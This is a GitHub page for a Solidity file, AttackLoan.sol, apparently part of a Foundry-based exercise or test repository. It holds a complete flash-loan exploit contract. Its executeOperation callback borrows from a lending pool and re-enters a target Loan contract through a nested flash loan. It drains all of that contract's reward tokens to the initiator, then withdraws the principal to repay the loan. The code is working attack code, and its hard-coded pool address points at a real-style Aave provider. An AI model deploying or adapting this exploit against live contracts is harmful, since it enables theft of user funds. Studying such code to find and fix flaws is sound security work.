-
Notifications
You must be signed in to change notification settings - Fork 7
/
AttackLoan.sol
54 lines (45 loc) · 2.09 KB
/
AttackLoan.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/console.sol";
import "openzeppelin-contracts/contracts/token/ERC20/IERC20.sol";
import {Loan, IFlashLoanSimpleReceiver, IPoolAddressesProvider} from "../../src/flashloan/Loan.sol";
import {IPool} from "../../src/flashloan/IPool.sol";
// @note this contract is not used in the attack, not for users to
contract AttackLoan is IFlashLoanSimpleReceiver {
IPoolAddressesProvider public constant ADDRESSES_PROVIDER =
IPoolAddressesProvider(0x0496275d34753A48320CA58103d5220d394FF77F);
IPool public immutable POOL;
Loan public immutable loan;
constructor(address _loan) {
loan = Loan(_loan);
POOL = IPool(ADDRESSES_PROVIDER.getPool());
}
function executeOperation(
address asset,
uint256 amount,
uint256 premium,
address initiator,
bytes calldata params
) external override returns (bool) {
require(msg.sender == address(POOL), "!pool");
IERC20(asset).approve(address(POOL), amount + premium);
console.log("Sending to loan contract");
IERC20(asset).transfer(address(loan), amount + premium);
console.log("Calling flash loan on loan contract");
POOL.flashLoanSimple(address(loan), asset, amount, "", 0);
// take all rewards
console.log("Taking all rewards");
console.log("Initator: %s", initiator);
uint256 rewardBalance = IERC20(loan.rewardToken()).balanceOf(address(loan));
loan.removeLoan(loan.rewardToken(), rewardBalance);
console.log("Sending rewards to initiator: %d", rewardBalance);
IERC20(loan.rewardToken()).transfer(initiator, rewardBalance);
// withdraw send amount
console.log("Withdraw asset from loan contract");
loan.removeLoan(asset, amount);
console.log("Should have enough to repay flash loan");
require(IERC20(asset).balanceOf(address(this)) >= amount + premium, "!payout");
// @note he funds will be automatically pulled at the conclusion of your operation.
return true;
}
}